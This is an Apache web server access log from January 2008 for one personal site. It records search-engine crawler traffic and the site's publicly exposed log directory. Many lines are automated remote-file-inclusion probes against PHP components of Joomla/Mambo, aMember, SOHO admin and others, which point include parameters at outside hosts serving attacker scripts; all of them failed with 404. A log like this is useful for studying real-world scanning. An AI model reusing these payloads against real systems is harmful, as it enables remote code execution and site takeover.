65.55.213.31 - - [22/Jan/2008:15:09:12 -0800] "GET /minamijewelry/html/images/jewelry/K4.jpg HTTP/1.0" 200 57930 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:15:09:13 -0800] "GET /minamijewelry/html/images/jewelry/K4t.jpg HTTP/1.0" 200 3023 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:15:09:13 -0800] "GET /minamijewelry/html/images/jewelry/W2.jpg HTTP/1.0" 200 57153 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:15:09:39 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:15:09:40 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:15:11:49 -0800] "GET /minamijewelry/html/images/jewelry/W6t.jpg HTTP/1.0" 200 3996 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:15:12:07 -0800] "GET /minamijewelry/html/images/jewelry/W4t.jpg HTTP/1.0" 200 3775 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
62.75.177.136 - - [22/Jan/2008:15:12:31 -0800] "GET /index.php?option=com_swmenuprohttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.25.135 - - [22/Jan/2008:15:12:55 -0800] "GET /presto/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.135.33.211 - - [22/Jan/2008:15:14:43 -0800] "GET /logs/access.log/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.33.211 - - [22/Jan/2008:15:14:43 -0800] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.33.211 - - [22/Jan/2008:15:14:43 -0800] "GET /logs/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.94.99.247 - - [22/Jan/2008:15:15:32 -0800] "GET /logs/access.log/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.99.247 - - [22/Jan/2008:15:15:32 -0800] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.99.247 - - [22/Jan/2008:15:15:33 -0800] "GET /logs/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:15:15:46 -0800] "GET /minamijewelry/html/images/jewelry/K1.jpg HTTP/1.0" 200 62680 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:15:15:46 -0800] "GET /minamijewelry/html/images/jewelry/K2.jpg HTTP/1.0" 200 61261 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:15:15:47 -0800] "GET /minamijewelry/html/images/wind_lg.jpg HTTP/1.0" 200 2770 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:15:15:47 -0800] "GET /minamijewelry/html/images/jewelry/W2t.jpg HTTP/1.0" 200 3265 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:15:15:47 -0800] "GET /minamijewelry/html/images/jewelry/W4.jpg HTTP/1.0" 200 69506 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
61.247.217.37 - - [22/Jan/2008:15:17:39 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yeti/0.01 (nhn/1noon, yetibot@naver.com, check robots.txt daily and follow it)" "www.dmulk.com"
61.247.217.37 - - [22/Jan/2008:15:17:39 -0800] "GET / HTTP/1.1" 200 2962 "-" "Yeti/0.01 (nhn/1noon, yetibot@naver.com, check robots.txt daily and follow it)" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:15:18:14 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:15:18:15 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:15:18:15 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:15:18:55 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.31 - - [22/Jan/2008:15:26:12 -0800] "GET /megumi/Necklace/?D=D HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
116.50.9.32 - - [22/Jan/2008:15:31:00 -0800] "GET /logs/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.179.208 - - [22/Jan/2008:15:36:48 -0800] "GET /funny/?D=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:15:46:21 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:15:46:21 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:15:46:22 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:15:48:12 -0800] "GET /mobileoffice/ HTTP/1.1" 200 5024 "-" "Nokia6820/2.0 (4.83) Profile/MIDP-1.0 Configuration/CLDC-1.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:15:49:24 -0800] "GET /logs/access.log//amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:15:49:25 -0800] "GET //amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:15:49:25 -0800] "GET /logs//amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.53.149.3 - - [22/Jan/2008:15:53:39 -0800] "GET /logs/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.crownvisioncenter.com/company/_notes/boo.do?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
161.53.149.3 - - [22/Jan/2008:15:53:39 -0800] "GET /mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.crownvisioncenter.com/company/_notes/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
161.53.149.3 - - [22/Jan/2008:15:54:29 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.crownvisioncenter.com/company/_notes/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
161.53.149.3 - - [22/Jan/2008:15:54:30 -0800] "GET /logs/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.crownvisioncenter.com/company/_notes/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:15:54:47 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:15:54:48 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:15:54:48 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:15:55:28 -0800] "GET /logs/access_070806.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:15:56:13 -0800] "GET /logs/ HTTP/1.1" 200 31899 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:16:01:50 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:16:02:02 -0800] "GET /logs/access_070714.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:16:02:20 -0800] "GET /tmp/ HTTP/1.1" 200 1504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:16:02:22 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:16:02:36 -0800] "GET /logs/access_071002.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:16:02:58 -0800] "GET /logs/access_071108.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:16:03:37 -0800] "GET /logs/access_070628.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
72.30.216.107 - - [22/Jan/2008:16:03:38 -0800] "GET /logs/access.log HTTP/1.0" 200 410288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:16:03:39 -0800] "GET /logs/access_070711.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:16:09:47 -0800] "GET /logs/access_080109.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:16:12:00 -0800] "GET /logs/access_080111.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
74.6.8.71 - - [22/Jan/2008:16:16:51 -0800] "GET /logs/access.log HTTP/1.0" 200 411228 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:16:25:08 -0800] "GET /logs/access.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:16:25:09 -0800] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:16:25:09 -0800] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
77.93.255.93 - - [22/Jan/2008:16:32:04 -0800] "GET /modifyform.html?code=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.93.255.93 - - [22/Jan/2008:16:32:19 -0800] "GET /logs/access.log/modifyform.html?code=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.93.255.93 - - [22/Jan/2008:16:32:20 -0800] "GET /logs/modifyform.html?code=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.93.255.93 - - [22/Jan/2008:16:32:35 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
207.111.203.183 - - [22/Jan/2008:16:33:01 -0800] "GET /logs//includes/functions_install.php?vwar_root=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
207.111.203.183 - - [22/Jan/2008:16:33:01 -0800] "GET //includes/functions_install.php?vwar_root=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:16:33:57 -0800] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:16:33:58 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:16:33:58 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
74.6.24.145 - - [22/Jan/2008:16:34:23 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:16:34:45 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.53.149.3 - - [22/Jan/2008:16:34:55 -0800] "GET /auth/ldap/authldap.php?includePath=http://www.crownvisioncenter.com/company/_notes/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
161.53.149.3 - - [22/Jan/2008:16:34:55 -0800] "GET /logs/auth/ldap/authldap.php?includePath=http://www.crownvisioncenter.com/company/_notes/boo.do?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
67.19.14.194 - - [22/Jan/2008:16:35:10 -0800] "GET /index.php?redir=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.73.190.200 - - [22/Jan/2008:16:36:08 -0800] "GET //component/option,com_forum/components/com_forum/forum.frame.php?ff_compath=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
69.73.190.200 - - [22/Jan/2008:16:36:08 -0800] "GET /logs//component/option,com_forum/components/com_forum/forum.frame.php?ff_compath=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:16:37:41 -0800] "GET /logs/access.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:16:37:41 -0800] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:16:38:22 -0800] "GET /logs/access.log/components/com_simpleboard/file_upload.php?sbp=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:16:38:23 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:16:38:23 -0800] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
74.6.19.236 - - [22/Jan/2008:16:39:03 -0800] "GET /retreat1/webcam/?M=D HTTP/1.0" 200 720630 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.8.232.250 - - [22/Jan/2008:16:40:31 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:16:40:34 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33136 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:16:40:34 -0800] "GET /warboard/css/styles_screen.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:16:40:34 -0800] "GET /warboard/css/styles_print.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:16:40:34 -0800] "GET /warboard/images/update.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:16:40:34 -0800] "GET /warboard/images/delete.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [22/Jan/2008:16:40:34 -0800] "GET /warboard/images/details.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:16:41:19 -0800] "GET /logs/access_071229.log/components/com_simpleboard/file_upload.php?sbp=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
66.147.237.116 - - [22/Jan/2008:16:43:33 -0800] "GET /logs/access_071230.log/bemarket/postscript/postscript.php?p_mode=http://onlinemarketingcenter.com/robot.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [22/Jan/2008:16:43:33 -0800] "GET /bemarket/postscript/postscript.php?p_mode=http://onlinemarketingcenter.com/robot.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [22/Jan/2008:16:43:33 -0800] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://onlinemarketingcenter.com/robot.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.208.78.80 - - [22/Jan/2008:16:44:01 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://lista.helloweb.eu/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
88.208.78.80 - - [22/Jan/2008:16:44:01 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://lista.helloweb.eu/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
74.6.25.23 - - [22/Jan/2008:16:44:55 -0800] "GET /mobileoffice/?M=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:16:45:23 -0800] "GET /logs/access_080106.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:16:45:23 -0800] "GET /logs/access_080108.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:16:45:23 -0800] "GET /logs/access_080110.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:16:45:24 -0800] "GET /logs/access_080107.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:16:45:26 -0800] "GET /logs/access_080112.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:16:54:30 -0800] "GET /logs/access.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:16:54:30 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:16:54:30 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.188.116.138 - - [22/Jan/2008:16:54:49 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?t=30553&page=7" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.6.26.13 - - [22/Jan/2008:16:56:12 -0800] "GET /bikes/?N=D HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.105 - - [22/Jan/2008:16:57:16 -0800] "GET /tmp/?N=D HTTP/1.0" 200 1657 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
189.10.197.234 - - [22/Jan/2008:16:59:35 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://autismsocietysa.org/Owl/Documents/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.146 - - [22/Jan/2008:17:01:15 -0800] "GET /tmp/sess_5216bb6b89ed803d92d38eefc7c30ced HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.14.194 - - [22/Jan/2008:17:01:39 -0800] "GET /logs/access.log/index.php?redir=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.14.194 - - [22/Jan/2008:17:01:39 -0800] "GET /logs/index.php?redir=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.127.100.104 - - [22/Jan/2008:17:01:48 -0800] "GET /logs/access.loghttp://homelessman.eclub.lv/images/pictureofmyself? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.dmulk.com"
